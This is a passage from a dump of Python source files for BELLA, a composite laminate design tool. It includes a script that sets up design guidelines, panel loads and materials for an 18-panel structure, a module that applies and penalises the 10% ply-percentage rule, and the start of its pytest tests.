plies\r\n# - a maximum percentage of constraints.percent_135 -45 deg plies\r\n# - disorientation rule enforced with variation of fibre angle between\r\n# adacent plies limited to a maximum value of constraints.delta_angle\r\n# degrees\r\n# - contiguity rule enforced with no more than constraints.n_contig\r\n# adajacent plies with same fibre angle\r\n# - damage tolerance rule enforced\r\n# if constraints.dam_tol_rule == 1 the restrictions are:\r\n# - one outer ply at + or -45 deg at the laminate surfaces\r\n# (2 plies intotal)\r\n# if constraints.dam_tol_rule == 2 the restrictions are:\r\n# - [+45, -45] or [-45, +45] at the laminate surfaces\r\n# (4 plies in total)\r\n# if constraints.dam_tol_rule == 3 the restrictions are:\r\n# - [+45,-45] [-45,+45] [+45,+45] or [-45,-45] at the laminate\r\n# surfaces (4 plies in total)\r\n# - out-of-plane orthotropy rule enforced to have small absolutes values\r\n# of LP_11 and LP_12 such that the values of D16 and D26 are small too\r\n\r\n## lay-up rules\r\n\r\n# set of admissible fibre orientations\r\nset_of_angles = 
np.array([-45, 0, 45, 90], dtype=int)\r\nset_of_angles = np.array([\r\n -45, 0, 45, 90, +30, -30, +60, -60, 15, -15, 75, -75], dtype=int)\r\n\r\nsym = True # symmetry rule\r\noopo = False # out-of-plane orthotropy requirements\r\n\r\nif constraints_set == 'C0':\r\n bal = False # balance rule\r\n rule_10_percent = False # 10% rule\r\n diso = False # disorientation rule\r\n contig = False # contiguity rule\r\n dam_tol = False # damage-tolerance rule\r\nelse:\r\n bal = True\r\n rule_10_percent = True\r\n diso = True\r\n contig = True\r\n dam_tol = True\r\n\r\nrule_10_Abdalla = True # 10% rule restricting LPs instead of ply percentages\r\npercent_Abdalla = 10 # percentage limit for the 10% rule applied on LPs\r\ncombine_45_135 = True # True if restriction on +-45 plies combined for 10% rule\r\npercent_0 = 10 # percentage used in the 10% rule for 0 deg plies\r\npercent_45 = 0 # percentage used in the 10% rule for +45 deg plies\r\npercent_90 = 10 # percentage used in the 10% rule for 90 deg plies\r\npercent_135 = 0 # percentage used in the 10% rule for -45 deg plies\r\npercent_45_135 =10 # percentage used in the 10% rule for +-45 deg plies\r\ndelta_angle = 45 # maximum angle difference for adjacent plies\r\nn_contig = 5 # maximum number of adjacent plies with the same fibre orientation\r\ndam_tol_rule = 1 # type of damage tolerance rule\r\n\r\n## ply-drop rules\r\n\r\ncovering = True # covering rule\r\nn_covering = 1 # number of plies ruled by covering rule at laminate surfaces\r\npdl_spacing = True # ply drop spacing rule\r\nmin_drop = 2 # Minimum number of continuous plies between ply drops\r\n\r\nconstraints = Constraints(\r\n sym=sym,\r\n bal=bal,\r\n oopo=oopo,\r\n dam_tol=dam_tol,\r\n dam_tol_rule=dam_tol_rule,\r\n covering=covering,\r\n n_covering=n_covering,\r\n rule_10_percent=rule_10_percent,\r\n rule_10_Abdalla=rule_10_Abdalla,\r\n percent_Abdalla=percent_Abdalla,\r\n percent_0=percent_0,\r\n percent_45=percent_45,\r\n percent_90=percent_90,\r\n percent_135=percent_135,\r\n percent_45_135=percent_45_135,\r\n combine_45_135=combine_45_135,\r\n diso=diso,\r\n contig=contig,\r\n n_contig=n_contig,\r\n delta_angle=delta_angle,\r\n set_of_angles=set_of_angles,\r\n min_drop=min_drop,\r\n pdl_spacing=pdl_spacing)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 10\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n\r\n# Lamination-parameter weightings in panel objective functions\r\n# (In practice these weightings can be different for each panel)\r\nlampam_weightings = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0])\r\n\r\n## Multi-panel objective function\r\n\r\n# Weightings of the panels in the multi-panel objecive function\r\npanel_weightings = np.ones((n_panels,), float)\r\n\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\nobj_func_param = ObjFunction(\r\n constraints=constraints,\r\n coeff_contig=coeff_contig,\r\n coeff_diso=coeff_diso,\r\n coeff_10=coeff_10,\r\n coeff_oopo=coeff_oopo,\r\n coeff_spacing=coeff_spacing)\r\n\r\n### Multi-panel composite laminate layout -------------------------------------\r\n\r\n# panel IDs\r\nID = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18]\r\n\r\n# number of panels\r\nn_panels = len(ID)\r\n\r\n# panel number of 
plies\r\nn_plies = [32, 28, 20, 18, 16, 22, 18, 24, 38,\r\n 34, 30, 28, 22, 18, 24, 30, 18, 22]\r\n\r\n# panels adjacency\r\nneighbour_panels = {\r\n 1 : [2, 9],\r\n 2 : [1, 3, 6, 10],\r\n 3 : [2, 4, 6],\r\n 4 : [3, 5, 7],\r\n 5 : [4, 8],\r\n 6 : [2, 3, 7],\r\n 7 : [4, 6, 8],\r\n 8 : [5, 7],\r\n 9 : [1, 10, 11],\r\n 10 : [2, 9, 12],\r\n 11 : [9, 12],\r\n 12 : [10, 11, 13, 16],\r\n 13 : [12, 14, 16],\r\n 14 : [13, 15, 17],\r\n 15 : [14, 18],\r\n 16 : [12, 13, 17],\r\n 17 : [14, 16, 18],\r\n 18 : [15, 17]}\r\n\r\n# boundary weights\r\nboundary_weights = {(1, 2) : 0.610,\r\n (1, 9) : 0.457,\r\n (2, 3) : 0.305,\r\n (2, 6) : 0.305,\r\n (2, 10) : 0.457,\r\n (3, 4) : 0.305,\r\n (3, 6) : 0.508,\r\n (4, 5) : 0.305,\r\n (4, 7) : 0.508,\r\n (5, 8) : 0.508,\r\n (6, 7) : 0.305,\r\n (7, 8) : 0.305,\r\n (9, 10) : 0.610,\r\n (9, 11) : 0.457,\r\n (10, 12) : 0.457,\r\n (11, 12) : 0.610,\r\n (12, 13) : 0.305,\r\n (12, 16) : 0.305,\r\n (13, 14) : 0.305,\r\n (13, 16) : 0.508,\r\n (14, 15) : 0.305,\r\n (14, 17) : 0.508,\r\n (15, 18) : 0.508,\r\n (16, 17) : 0.305,\r\n (17, 18) : 0.305}\r\n\r\n# panel length in the x-direction (m)\r\nlength_x = (25.40/1000)*np.array([18, 18, 20, 20, 20, 20, 20, 20,\r\n 18, 18, 18, 18, 20, 20, 20, 20, 20, 20])\r\n\r\n# panel length in the y-direction (m)\r\nlength_y = (25.40/1000)*np.array([24, 24, 12, 12, 12, 12, 12, 12,\r\n 24, 24, 24, 24, 12, 12, 12, 12, 12, 12])\r\n\r\n# 1 lbf/in = 0.175127 N/mm\r\n# panel loading per unit width in the x-direction in N/m\r\nN_x = 175.127*np.array([700, 375, 270, 250, 210, 305, 290, 600,\r\n 1100, 900, 375, 400, 330, 190, 300, 815, 320, 300])\r\n\r\n# panel loading per unit width in the y-direction in N/m\r\nN_y = 175.127*np.array([400, 360, 325, 200, 100, 360, 195, 480,\r\n 600, 400, 525, 320, 330, 205, 610, 1000, 180, 410])\r\n\r\n\r\n# panel amination parameters targets\r\nlampam_targets = [np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.208, -0.843, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.092, -0.714, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.722, 0.054, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.228, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.477, -0.235, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.288, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.597, -0.252, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.192, -0.657, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.308, -0.776, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.241, -0.816, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, 0.092, -0.714, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.228, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.597, -0.252, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.241, -0.816, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.582, -0.228, 0, 0]),\r\n np.array([0, 0, 0, 0, 0, 0, 0, 0, -0.469, -0.335, 0, 0])]\r\n\r\npanels = []\r\nfor ind_panel in range(n_panels):\r\n panels.append(Panel(\r\n ID=ID[ind_panel],\r\n lampam_target=lampam_targets[ind_panel],\r\n lampam_weightings=lampam_weightings,\r\n n_plies=n_plies[ind_panel],\r\n length_x=length_x[ind_panel],\r\n length_y=length_y[ind_panel],\r\n N_x=N_x[ind_panel],\r\n N_y=N_y[ind_panel],\r\n weighting=panel_weightings[ind_panel],\r\n neighbour_panels=neighbour_panels[ID[ind_panel]],\r\n constraints=constraints))\r\n\r\n\r\nmultipanel = MultiPanel(panels, boundary_weights)\r\nmultipanel.filter_target_lampams(constraints, 
obj_func_param)\r\nmultipanel.filter_lampam_weightings(constraints, obj_func_param)\r\n\r\n### Objective function parameters ---------------------------------------------\r\n\r\n# Coefficient for the 10% rule penalty\r\ncoeff_10 = 1\r\n# Coefficient for the contiguity constraint penalty\r\ncoeff_contig = 1\r\n# Coefficient for the disorientation constraint penalty\r\ncoeff_diso = 1\r\n# Coefficient for the out-of-plane orthotropy penalty\r\ncoeff_oopo = 1\r\n# Coefficient for the ply drop spacing guideline penalty\r\ncoeff_spacing = 1\r\n\r\nobj_func_param = ObjFunction(\r\n    constraints=constraints,\r\n    coeff_contig=coeff_contig,\r\n    coeff_diso=coeff_diso,\r\n    coeff_10=coeff_10,\r\n    coeff_oopo=coeff_oopo,\r\n    coeff_spacing=coeff_spacing)\r\n\r\n### Material properties -------------------------------------------------------\r\n\r\n# Elastic modulus in the fibre direction in Pa\r\nE11 = 20.5/1.45038e-10 # 141 GPa\r\n# Elastic modulus in the transverse direction in Pa\r\nE22 = 1.31/1.45038e-10 # 9.03 GPa\r\n# Poisson's ratio relating transverse deformation and axial loading (-)\r\nnu12 = 0.32\r\n# In-plane shear modulus in Pa\r\nG12 = 0.62/1.45038e-10 # 4.27 GPa\r\n# Areal density in g/m2\r\ndensity_area = 300.5\r\n# Ply thickness in m\r\nply_t = (25.40/1000)*0.0075 # 0.191 mm\r\n\r\nmaterials = Material(E11=E11, E22=E22, G12=G12, nu12=nu12,\r\n                     density_area=density_area, ply_t=ply_t)\r\n\r\n### Saving everything on an Excel file ----------------------------------------\r\n\r\nsave_multipanel(filename, multipanel, obj_func_param, calc_penalties=False,\r\n                constraints=constraints, mat=materials, save_buckling=True)\r\nsave_constraints_BELLA(filename, constraints)\r\nsave_objective_function_BELLA(filename, obj_func_param)\r\nsave_materials(filename, materials)\r\nautofit_column_widths(filename)\r\n\r\n"
},
{
"alpha_fraction": 0.4797810912132263,
"alphanum_fraction": 0.552325963973999,
"avg_line_length": 40.053707122802734,
"blob_id": "7d4dbba172df667349690995cc71fbb4d3311779",
"content_id": "bfe351fda92f9ab5dd8b2c37c45e8276a3754aee",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16445,
"license_type": "permissive",
"max_line_length": 636,
"num_lines": 391,
"path": "/src/guidelines/ten_percent_rule.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nApplication of the 10% rule for the design of a laminate\r\n\r\n- display_ply_counts\r\n displays the ply counts in each fibre direction for a laminate lay-up\r\n\r\n- is_ten_percent_rule\r\n returns True for a panel stacking sequence satisfying the 10% rule,\r\n False otherwise\r\n\r\n- calc_penalty_10_ss and calc_penalty_10_pc\r\n returns the stacking sequence penalty for 10% rule\r\n\r\n- ten_percent_rule\r\n returns only the stacking sequences that satisfy the 10% rule when added to\r\n plies for which the ply orientations have been previously determined\r\n\r\n- calc_n_plies_per_angle\r\n returns the ply counts in each fibre direction\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nimport math\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.divers.pretty_print import print_list_ss\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\ndef display_ply_counts(stack, constraints):\r\n '''\r\n displays the ply counts in each fibre direction for a laminate lay-up\r\n\r\n INPUTS\r\n\r\n - stack (array): stacking sequence\r\n - constraints (instance of the class Constraints): set of design guidelines\r\n '''\r\n print('number of 0 plies: ', sum(stack == 0))\r\n for angle in constraints.angles_bal[:, 0]:\r\n print('number of +' + str(angle) + ' plies: ', sum(stack == angle))\r\n print('number of -' + str(angle) + ' plies: ', sum(stack == -angle))\r\n print('number of 90 plies: ', sum(stack == 90))\r\n return 0\r\n\r\n\r\ndef calc_ply_counts(multipanel, stacks, constraints):\r\n \"\"\"\r\n calculates the ply counts in each fibre angle per panel in a multi-panel\r\n composite laminate structure\r\n\r\n Args:\r\n constraints (instance of the class Constraints): set of design\r\n guidelines\r\n stack (numpy array): panel stacking sequences\r\n\r\n Returns:\r\n ply counts in each fibre angle per panel in a multi-panel composite\r\n laminate structure\r\n \"\"\"\r\n n_plies_per_angles = np.zeros((\r\n multipanel.reduced.n_panels, constraints.n_set_of_angles),\r\n dtype='float16')\r\n for ind_panel in range(multipanel.reduced.n_panels):\r\n for index in range(len(stacks[ind_panel])):\r\n index = constraints.ind_angles_dict[stacks[ind_panel][index]]\r\n n_plies_per_angles[ind_panel][index] += 1\r\n return n_plies_per_angles\r\n\r\ndef is_ten_percent_rule(\r\n constraints, stack=None, ply_queue=None, n_plies_per_angle=None,\r\n equality_45_135=False, equality_0_90=False, LPs=None):\r\n \"\"\"\r\n checks the satisfaction to the 10% rule\r\n\r\n Args:\r\n constraints (instance of the class Constraints): set of design\r\n guidelines\r\n stack (numpy array): partial stacking sequence with the angle 666 used\r\n for unknown ply fibre orientations\r\n ply_queue (list): ply fibre orientations for the remaining plies in the\r\n stacking sequence\r\n n_plies_per_angle (numpy array): ply counts in each fibre orientation\r\n equality_45_135 (boolean): True if +45/-45 plies are not differentiated\r\n equality_0_90 (boolean): True if 0/90 plies are not differentiated\r\n\r\n Returns:\r\n boolean: True if the stacking sequence 'stack' satisfies the 10% rule,\r\n False otherwise.\r\n\r\n Examples:\r\n >>> constraints=Constraints(rule_10_percent=True, percent_0=50)\r\n >>> is_ten_percent_rule(constraints, stack=np.array([0, 45, 90], int))\r\n False\r\n \"\"\"\r\n if constraints.rule_10_percent and constraints.rule_10_Abdalla \\\r\n and 
LPs is not None:\r\n        if math.pow((1 - 4 * constraints.percent_Abdalla), 2) \\\r\n                + (1 - 4 * constraints.percent_Abdalla) * LPs[1] \\\r\n                - 2 * math.pow(LPs[0], 2) + 1e-15 < 0:\r\n            return False\r\n        if 1 - 4 * constraints.percent_Abdalla - LPs[1] + 1e-15 < 0:\r\n            return False\r\n        return True\r\n\r\n    if n_plies_per_angle is not None:\r\n        if constraints.percent_tot > 0:\r\n            n_total = sum(n_plies_per_angle)\r\n            percent_0 = n_plies_per_angle[constraints.index0] / n_total\r\n            percent_45 = n_plies_per_angle[constraints.index45] / n_total\r\n            percent_90 = n_plies_per_angle[constraints.index90] / n_total\r\n            percent_135 = n_plies_per_angle[constraints.index135] / n_total\r\n            if percent_0 < constraints.percent_0 \\\r\n                    or percent_45 < constraints.percent_45 \\\r\n                    or percent_90 < constraints.percent_90 \\\r\n                    or percent_135 < constraints.percent_135 \\\r\n                    or percent_45 + percent_135 < constraints.percent_45_135:\r\n                return False\r\n        return True\r\n\r\n    if isinstance(stack, list):\r\n        n_total = len(stack)\r\n    else:\r\n        n_total = stack.size\r\n\r\n    if ply_queue is not None:\r\n\r\n        if constraints.sym:\r\n            percent_0 = 2 * (\r\n                sum(stack[:stack.size // 2] == 0) + ply_queue.count(0))\r\n            percent_45 = 2 * (\r\n                sum(stack[:stack.size // 2] == 45) + ply_queue.count(45))\r\n            percent_90 = 2 * (\r\n                sum(stack[:stack.size // 2] == 90) + ply_queue.count(90))\r\n            percent_135 = 2 * (\r\n                sum(stack[:stack.size // 2] == -45) + ply_queue.count(-45))\r\n            if stack.size % 2:\r\n                # middle ply of an odd-count symmetric stack sits at index size // 2\r\n                mid_ply_angle = stack[stack.size // 2]\r\n                if mid_ply_angle == 0:\r\n                    percent_0 += 1\r\n                if mid_ply_angle == 90:\r\n                    percent_90 += 1\r\n                if mid_ply_angle == 45:\r\n                    percent_45 += 1\r\n                if mid_ply_angle == -45:\r\n                    percent_135 += 1\r\n        else:\r\n            percent_0 = sum(stack == 0) + ply_queue.count(0)\r\n            percent_45 = sum(stack == 45) + ply_queue.count(45)\r\n            percent_90 = sum(stack == 90) + ply_queue.count(90)\r\n            percent_135 = sum(stack == -45) + ply_queue.count(-45)\r\n    else:\r\n        percent_0 = sum(stack == 0)\r\n        percent_45 = sum(stack == 45)\r\n        percent_90 = sum(stack == 90)\r\n        percent_135 = sum(stack == -45)\r\n\r\n    percent_0 /= n_total\r\n    percent_45 /= n_total\r\n    percent_90 /= n_total\r\n    percent_135 /= n_total\r\n\r\n#    print(percent_0, constraints.percent_0)\r\n#    print(percent_90, constraints.percent_90)\r\n#    print(percent_45, constraints.percent_45)\r\n#    print(percent_135, constraints.percent_135)\r\n#    print(percent_45 + percent_135, constraints.percent_45_135)\r\n\r\n    if not equality_0_90 and (percent_0 + 1e-15 < constraints.percent_0\\\r\n        or percent_90 + 1e-15 < constraints.percent_90):\r\n        return False\r\n\r\n    if equality_0_90 and (percent_0 + percent_90 + 1e-15 \\\r\n        < constraints.percent_0 + constraints.percent_90):\r\n        return False\r\n\r\n    if not equality_45_135 and (percent_45 + 1e-15 < constraints.percent_45 \\\r\n        or percent_135 + 1e-15 < constraints.percent_135):\r\n        return False\r\n\r\n    if equality_45_135 and (percent_45 + percent_135 + 1e-15 < \\\r\n        constraints.percent_45 + constraints.percent_135):\r\n        return False\r\n\r\n    if percent_45 + percent_135 + 1e-15 < constraints.percent_45_135:\r\n        return False\r\n\r\n    return True\r\n\r\n\r\ndef calc_penalty_10_ss(ss, constraints, LPs=None, mp=False):\r\n    \"\"\"\r\n    returns the stacking sequence penalty for 10% rule\r\n\r\n    INPUTS\r\n\r\n    - ss: stacking sequences\r\n    - constraints: design guidelines\r\n    - mp = true: for when the input is a list of stacking sequences\r\n    \"\"\"\r\n\r\n    if constraints.rule_10_percent and constraints.rule_10_Abdalla \\\r\n            and LPs is not None:\r\n        if not 
mp:\r\n return calc_distance_Abdalla(LPs, constraints)\r\n else:\r\n return np.array([calc_distance_Abdalla(lps, constraints) \\\r\n for lps in LPs])\r\n\r\n if constraints.percent_tot > 0:\r\n if not mp:\r\n ss = np.array(ss)\r\n n_total = ss.size\r\n percent_0 = np.sum(ss == 0)/n_total\r\n percent_45 = np.sum(ss == 45)/n_total\r\n percent_90 = np.sum(ss == 90)/n_total\r\n percent_135 = np.sum(ss == -45)/n_total\r\n return (max(0, constraints.percent_0 - percent_0)\r\n + max(0, constraints.percent_45 - percent_45)\r\n + max(0, constraints.percent_90 - percent_90)\r\n + max(0, constraints.percent_135 - percent_135)\r\n + max(0,\r\n constraints.percent_45_135 - percent_45-percent_135))\r\n else:\r\n if isinstance(ss, list): length = len(ss)\r\n else: length = ss.shape[0]\r\n penalties = np.zeros((length,))\r\n for ind_ss in range(length):\r\n penalties[ind_ss] = calc_penalty_10_ss(ss[ind_ss], constraints)\r\n return penalties\r\n\r\n if not mp:\r\n return 0\r\n return np.zeros((ss.shape[0],))\r\n\r\n\r\ndef calc_penalty_10_pc(n_plies_per_angle, constraints, cummul_areas=1):\r\n \"\"\"\r\n returns the penalty for 10% rule based on n_plies_per_angle\r\n \"\"\"\r\n if constraints.percent_tot > 0:\r\n if (isinstance(n_plies_per_angle, np.ndarray) \\\r\n and n_plies_per_angle.ndim == 1)\\\r\n or isinstance(n_plies_per_angle, list):\r\n n_total = sum(n_plies_per_angle)\r\n if n_total:\r\n percent_0 = n_plies_per_angle[constraints.index0]/n_total\r\n percent_45 = n_plies_per_angle[constraints.index45]/n_total\r\n percent_90 = n_plies_per_angle[constraints.index90]/n_total\r\n percent_135 = n_plies_per_angle[constraints.index135]/n_total\r\n return cummul_areas * (\r\n max(0, constraints.percent_0 - percent_0)\r\n + max(0, constraints.percent_45 - percent_45)\r\n + max(0, constraints.percent_90 - percent_90)\r\n + max(0, constraints.percent_135 - percent_135)\r\n + max(0, constraints.percent_45_135 \\\r\n - percent_45 - percent_135))\r\n\r\n penalties = np.zeros((n_plies_per_angle.shape[0],))\r\n for ind_ss in range(n_plies_per_angle.shape[0]):\r\n n_total = sum(n_plies_per_angle[ind_ss])\r\n if n_total:\r\n percent_0 = n_plies_per_angle[\r\n ind_ss][constraints.index0]/n_total\r\n percent_45 = n_plies_per_angle[\r\n ind_ss][constraints.index45]/n_total\r\n percent_90 = n_plies_per_angle[\r\n ind_ss][constraints.index90]/n_total\r\n percent_135 = n_plies_per_angle[\r\n ind_ss][constraints.index135]/n_total\r\n penalties[ind_ss] = (\r\n max(0, constraints.percent_0 - percent_0)\r\n + max(0, constraints.percent_45 - percent_45)\r\n + max(0, constraints.percent_90 - percent_90)\r\n + max(0, constraints.percent_135 - percent_135)\r\n + max(0, constraints.percent_45_135 \\\r\n - percent_45 - percent_135))\r\n return cummul_areas * penalties\r\n\r\n if (isinstance(n_plies_per_angle, np.ndarray) \\\r\n and n_plies_per_angle.ndim == 1) \\\r\n or isinstance(n_plies_per_angle, list):\r\n return 0\r\n return np.zeros((n_plies_per_angle.shape[0],))\r\n\r\n\r\ndef calc_n_plies_per_angle(\r\n n_plies_per_angle_ini, constraints, middle_ply, angle, angle2=None):\r\n '''\r\n returns the ply counts in each fibre direction\r\n\r\n INPUTS\r\n - angle: the sublaminate stacking sequences\r\n - angle2: the second sublaminate stacking sequences\r\n - n_plies_per_angle_ini: number of initials plies per fibre\r\n orientation in the same order indicated in constraints.set_of_angles\r\n - constraints.rule_10_percent = True implies the 10% rule is active\r\n '''\r\n if angle.ndim == 1:\r\n angle = angle.reshape((1, 
angle.size))\r\n size_ss = angle.shape[0]\r\n n_plies_per_angle_tab = np.matlib.repmat(n_plies_per_angle_ini, size_ss, 1)\r\n if angle2 is None: # For S or U laminates\r\n for ind_ss in np.arange(size_ss)[::-1]:\r\n n_plies_per_angle = np.copy(n_plies_per_angle_ini)\r\n for ind_ply in range(angle.shape[1]):\r\n index = constraints.ind_angles_dict[angle[ind_ss, ind_ply]]\r\n n_plies_per_angle[index] += 1\r\n if middle_ply != 0:\r\n index = constraints.ind_angles_dict[angle[ind_ss, -1]]\r\n n_plies_per_angle[index] -= 1/2\r\n n_plies_per_angle_tab[ind_ss] = n_plies_per_angle\r\n else:\r\n for ind_ss in np.arange(size_ss)[::-1]:\r\n n_plies_per_angle = np.copy(n_plies_per_angle_ini)\r\n for ind_ply in range(angle.shape[1]):\r\n index = constraints.ind_angles_dict[angle[ind_ss, ind_ply]]\r\n n_plies_per_angle[index] += 1\r\n for ind_ply in range(angle2.shape[1]):\r\n index = constraints.ind_angles_dict[angle2[ind_ss, ind_ply]]\r\n n_plies_per_angle[index] += 1\r\n if middle_ply != 0:\r\n index = constraints.ind_angles_dict[angle[ind_ss, -1]]\r\n n_plies_per_angle[index] -= 1/2\r\n n_plies_per_angle_tab[ind_ss] = n_plies_per_angle\r\n return n_plies_per_angle_tab\r\n\r\n\r\nif __name__ == \"__main__\":\r\n constraints = Constraints(\r\n sym=True,\r\n rule_10_percent=True,\r\n percent_0=10,\r\n percent_45=10,\r\n percent_90=10,\r\n percent_135=10)\r\n\r\n print('*** Test for the function display_ply_counts ***\\n')\r\n display_ply_counts(stack=np.array([\r\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 45, 90, 90, 90, 90, 90, 90, -45, -45, -45, -45, -45, -45, -45, -45, -45, -45, 90, 90, 90, 90, 90, 90, 45, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], int), constraints=constraints)\r\n\r\n\r\n print('\\n*** Test for the function calc_penalty_10_ss ***\\n')\r\n ss = [0, 45, 45, 90, -45]\r\n print(calc_penalty_10_ss(ss, constraints))\r\n\r\n print('\\n*** Test for the function calc_penalty_10_pc ***\\n')\r\n n_plies_per_angle = [0, 0, 0, 0, 0, 10]\r\n print(calc_penalty_10_pc(n_plies_per_angle, constraints))\r\n\r\n\r\n print('\\n*** Test for the function calc_n_plies_per_angle ***\\n')\r\n middle_ply = 0\r\n n_plies_per_angle = np.array([0., 0., 0., 0.])\r\n ss = np.array([[45, -45, 0, 45, 90],\r\n [45, 90, 45, 45, 45],\r\n [0, 45, 45, 45, 90],\r\n [90, 45, 45, 45, 0],\r\n [45, 45, 45, 90, 45],\r\n [45, 45, 0, -45, 45]])\r\n print('Input stacking sequences:\\n')\r\n print_list_ss(ss)\r\n n_plies_per_angle = calc_n_plies_per_angle(\r\n n_plies_per_angle, constraints, middle_ply, ss)\r\n print('ply counts', n_plies_per_angle)\r\n\r\n\r\n constraints = Constraints(\r\n sym=True,\r\n rule_10_percent=True,\r\n rule_10_Abdalla=True,\r\n percent_Abdalla=10)\r\n\r\n print('\\n*** Test for the function calc_penalty_10_ss ***\\n')\r\n ss = [0, 45, 45, 90, -45]\r\n print(calc_penalty_10_ss(ss, constraints, LPs=[\r\n 4.08931640e-01, -1.00000000e-01, 0.00000000e+00, 1.46895913e-18,\r\n 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -7.89491929e-18,\r\n 2.44936031e-01, -4.72222222e-02, -5.38750716e-02, 6.54330305e-03]))\r\n\r\n print(calc_penalty_10_ss(ss, constraints, mp=True, LPs=np.array([[\r\n 4.08931640e-01, -1.00000000e-01, 0.00000000e+00, 1.46895913e-18,\r\n 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -7.89491929e-18,\r\n 2.44936031e-01, -4.72222222e-02, -5.38750716e-02, 6.54330305e-03],\r\n 
[4.08931640e-01, -1.00000000e-01, 0.00000000e+00, 1.46895913e-18,\r\n 0.00000000e+00, 0.00000000e+00, 0.00000000e+00, -7.89491929e-18,\r\n 2.44936031e-01, -4.72222222e-02, -5.38750716e-02, 6.54330305e-03]])))\r\n\r\n"
},
{
"alpha_fraction": 0.5572705268859863,
"alphanum_fraction": 0.6092607378959656,
"avg_line_length": 36.40625,
"blob_id": "fe1a1fef2ef65ea20ff457dfbed64df648d47ba9",
"content_id": "08e1307c6d42f8c424756ee32a392dcf2b54d53c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2462,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 64,
"path": "/src/guidelines/test_10_percent_rule.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# - * - coding: utf - 8 - * -\r\n\"\"\"\r\nThis module test the functions for the 10% rule.\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport sys\r\nimport numpy as np\r\nimport math as ma\r\nimport pytest\r\n\r\nsys.path.append(r'C:\\BELLA')\r\nfrom src.BELLA.constraints import Constraints\r\nfrom src.guidelines.ten_percent_rule import is_ten_percent_rule\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_2_points\r\nfrom src.guidelines.ten_percent_rule_Abdalla import calc_distance_Abdalla\r\n\r\[email protected](\r\n \"\"\"constraints, stack, ply_queue, n_plies_per_angle, equality_45_135,\r\nequality_0_90, expect\"\"\", [\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n np.array([0, 45, 90], int), [], None, False, False, False),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n np.array([0, 45, 90], int), None, None, False, False, False),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n np.array([0, 666, 666], int), [0, 45], None, False, False, True),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n None, None, np.array([3, 0, 3, 0]), False, False, False),\r\n (Constraints(rule_10_percent=True, percent_0=50),\r\n None, None, np.array([0, 3, 0, 3]), False, False, True)\r\n ])\r\n\r\ndef test_is_ten_percent_rule(\r\n constraints, stack, ply_queue, n_plies_per_angle, equality_45_135,\r\n equality_0_90, expect):\r\n output = is_ten_percent_rule(\r\n constraints, stack, ply_queue, n_plies_per_angle, equality_45_135,\r\n equality_0_90)\r\n assert output == expect\r\n\r\[email protected](\r\n \"\"\"point1, point2, expect\"\"\", [\r\n (np.array([0, 0]), np.array([0, 0]), 0),\r\n (np.array([0, 0]), np.array([0, 2]), 2),\r\n (np.array([0, 0]), np.array([1, 1]), ma.sqrt(2)),\r\n ])\r\n\r\ndef test_calc_distance_2_points(point1, point2, 